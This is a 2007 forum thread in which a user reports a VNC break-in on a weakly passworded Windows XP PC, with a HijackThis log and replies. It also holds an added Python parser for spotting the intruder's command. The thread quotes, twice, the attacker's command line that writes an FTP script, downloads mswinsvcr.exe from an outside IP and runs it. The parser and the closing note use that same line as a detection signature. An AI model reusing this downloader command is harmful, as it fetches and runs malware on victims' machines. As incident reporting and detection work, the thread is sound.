Been hacked ...



Geek4414
14-09-2007, 06:22 PM
I have been experimenting with VPN and VNC on a PC and only had a very weak password on it. Someone or a bot has hacked in and tried to download some malware to it.

I think the firewall has blocked the download of the exe. I did a quick search in the CMD window and it is disturbing to find the file "eq" physically in this PC's user folder; this file contains the script in the FTP screen cap below, and mswinsvcr.exe is also there but as a zero-byte file. I can't delete the file from the command prompt; the system complains that it's being used by another process. I can however delete it from Explorer. Very strange.

Neither NOD32 nor Ad-Aware 2007 picked up any nasties, so should I be concerned?

This CMD window was left on the screen when I looked at the PC this afternoon ...

C:\Documents and Settings\M1>%systemroot%\system32\cmd.exe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\M1>del eq&echo open 222.82.66.236 27168 >> eq&ech
o user 12592 13533 >> eq &echo get mswinsvcr.exe >> eq &echo quit >> eq &ftp -n
-s:eq &mswinsvcr.exe &del eq
Could Not Find C:\Documents and Settings\M1\eq
ftp> open 222.82.66.236 27168
Connected to 222.82.66.236.
220 StnyFtpd 0wns j0
ftp> user 12592 13533
331 Password required
230 User logged in.
ftp> get mswinsvcr.exe
200 PORT command successful.
150 Opening BINARY mode data connection



P.S. The login password for the user and the VNC password have been changed to a much stronger password now.
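As an added example (not from the thread or any poster in it), here is a small Python parser for the echo-to-script / ftp -s: downloader one-liner seen in the CMD capture above. A responder can run it over process-creation or command-line logs to pull out the FTP server, port, credentials, fetched file and whether the payload was launched; the sample input is the thread's own command line re-joined from its 80-column wrap.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input: the downloader one-liner from the CMD capture,
# re-joined from its 80-column wrap so the parser can read it in one piece.
SAMPLE_CMDLINE = (
    "del eq&echo open 222.82.66.236 27168 >> eq&echo user 12592 13533 >> eq "
    "&echo get mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq"
)

@dataclass
class Indicators:
    script_file: str
    host: Optional[str] = None
    port: Optional[str] = None
    user: Optional[str] = None
    password: Optional[str] = None
    fetched: list = field(default_factory=list)   # files pulled with 'get'
    executed: list = field(default_factory=list)  # fetched files later run

def parse_ftp_downloader(cmdline: str) -> Optional[Indicators]:
    """Indicators from an 'echo ... >> script & ftp -s:script' command line,
    or None when the line does not use that downloader pattern."""
    m = re.search(r"\bftp\b[^&]*?-s:(\S+)", cmdline)
    if not m:
        return None
    ind = Indicators(script_file=m.group(1))
    # Every 'echo <verb> <args> >> <script>' segment is one line of the ftp script.
    pat = r"\becho\s+(\w+)\s*([^&>]*?)\s*>>\s*" + re.escape(ind.script_file) + r"(?![\w.])"
    for verb, args in re.findall(pat, cmdline):
        words = args.split()
        if verb == "open" and words:
            ind.host = words[0]
            ind.port = words[1] if len(words) > 1 else "21"  # ftp default port
        elif verb == "user" and words:
            ind.user = words[0]
            ind.password = words[1] if len(words) > 1 else None
        elif verb == "get" and words:
            ind.fetched.append(words[0])
    # A bare segment naming a fetched file means the payload was launched.
    for seg in (s.strip() for s in cmdline.split("&")):
        if seg in ind.fetched:
            ind.executed.append(seg)
    return ind

def triage_summary(ind: Indicators) -> str:
    """One-line note a responder can paste into a ticket."""
    return (f"ftp downloader via {ind.script_file}: server {ind.host}:{ind.port}, "
            f"creds {ind.user}/{ind.password}, fetched {ind.fetched}, executed {ind.executed}")
```

Because the file is written with `>>`, a script name like "eq" left behind in a user profile, together with `ftp -n -s:` in a process command line, is a cheap signature to alert on.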

winmacguy
14-09-2007, 06:29 PM
You might want to use a stronger password. Also you could download and run HiJackThis from Speedy's sig and run it, then post the log file on the forum for a diagnostic.

Geek4414
14-09-2007, 06:53 PM
You might want to use a stronger password. Also you could download and run HiJackThis from Speedy's sig and run it, then post the log file on the forum for a diagnostic.

Thanks WinMacGuy, I might do that this weekend.

I installed MS Monitor 3.1 on that PC and have it logging the network activity over the weekend. I just noticed a bunch of ICMP messages from China (same city as the hack from yesterday), so the person or bot is still sniffing around.

My concern is how did they download a script and execute it on this PC. I suspect it's a bot, since a real cracker wouldn't leave the CMD window open. To be honest, without the cmd window being there, I probably would never have guessed that the PC has been compromised.

How can we prevent scripts from sneaking in? I had to turn off the firewall on the SMC router as one of the Citrix web apps would not run with it on, even if I opened up port 443 for special applications.

While on the subject of the Citrix web app, it has been timing out badly over the past few days. The support desk for the app suggested that it's either the local LAN or the internet router choking up. What are the best tools to check the LAN & the internet connection?

winmacguy
14-09-2007, 07:03 PM
If you run the HJT file from Speedy's sig now you could get an answer tonight. It only takes a few seconds to run it.
To answer your other question - you're on a PC with a weak password which was probably hacked in a matter of minutes.

Geek4414
14-09-2007, 09:08 PM
Here is a HijackThis log, can't see anything that looks fishy ...


Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 9:19:08 PM, on 9/14/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16512)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Eset\nod32krn.exe
C:\Program Files\RealVNC\VNC4\WinVNC4.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.EXE
C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\ccc.exe
C:\Program Files\Microsoft Network Monitor 3\netmon.exe
C:\WINDOWS\system32\cmd.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
E:\Downloads\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://go.microsoft.com/fwlink/?LinkId=74005
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [UniPrint] C:\Program Files\UniPrint\Client\SetDfltSettings.exe
O4 - HKCU\..\Run: [StartCCC] C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{E3784368-8D9B-408C-9102-B3323E6F3DFF}: NameServer = 202.27.184.3,202.27.184.5
O23 - Service: Ad-Aware 2007 Service (aawservice) - Lavasoft AB - C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: NBService - Nero AG - C:\Program Files\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Program Files\RealVNC\VNC4\WinVNC4.exe

--
End of file - 4256 bytes

mainframemouse
14-09-2007, 11:35 PM
Hi, we've just had a similar attack. It happened while a user was working so it never got to fire off the CMD prompt. Has anyone got any more info on this, since it got through our firewall?

Regards V